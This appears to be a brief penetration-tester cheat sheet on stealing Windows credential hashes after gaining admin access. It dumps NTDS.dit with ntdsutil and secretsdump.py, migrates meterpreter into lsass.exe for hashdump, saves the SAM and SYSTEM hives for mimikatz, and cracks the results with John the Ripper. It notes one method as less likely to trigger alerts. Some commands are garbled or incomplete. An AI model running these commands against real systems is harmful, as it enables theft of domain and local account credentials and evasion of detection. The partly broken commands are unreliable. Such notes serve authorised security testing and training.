Obtaining Windows Domain Controller Hashes

*After obtaining Admin access*

The tool of choice is built into Windows.  It is an active directory domain services management tool called ntdsutil. This is designed to managed AD data.

To gather NTDS.dit and system registered hive data, run the following


activate instance ntds (this will generate a backup of the C:\ntds directory)


This is less likely to trigger an alert

After retrieving this data, it will need to be decrypted. A tool that can be used for this process is called secretsdump.py (https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Command: secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL

Obtaining Windows 10 password hashes

There are two options to obtaining the local hashes from a Windows box

  1. Password hashes from memory using meterpreter hashdump command
  2. Mimikatz


Hashdump will fail with the error priv_passwd_get_sam_hashes error

To work around this problem, we just have to move to a different process. Change from the current process to Lsass.exe

Newer shells you can combine the PS and migrate steps in the following command migrate -N lsass.exe

if successful, rerun hashdump


retrieve the contents of HKLM\sam and HKLM\system

Then make them available to mimikatz

reg save hklm\sam sam.hiv $$ reg save hklm\system system.hiv

c:\tools\mimikatz\x64\mimikatz.exe “lsadump::sam /sam:sam.hiv


John the Ripper

Cracking windows passwords with John

You will need to give John the text-based output from Meterpreter’s hashdump module, mimikatz, or secretsdump.py

Merging the etc/passwd and etc/shadow files

unshadow /etc/passwd etc/shadow > combined

For windows NT targets, you must specify –format=NT

For LANMAN targetsm you must specify –format=LANMAN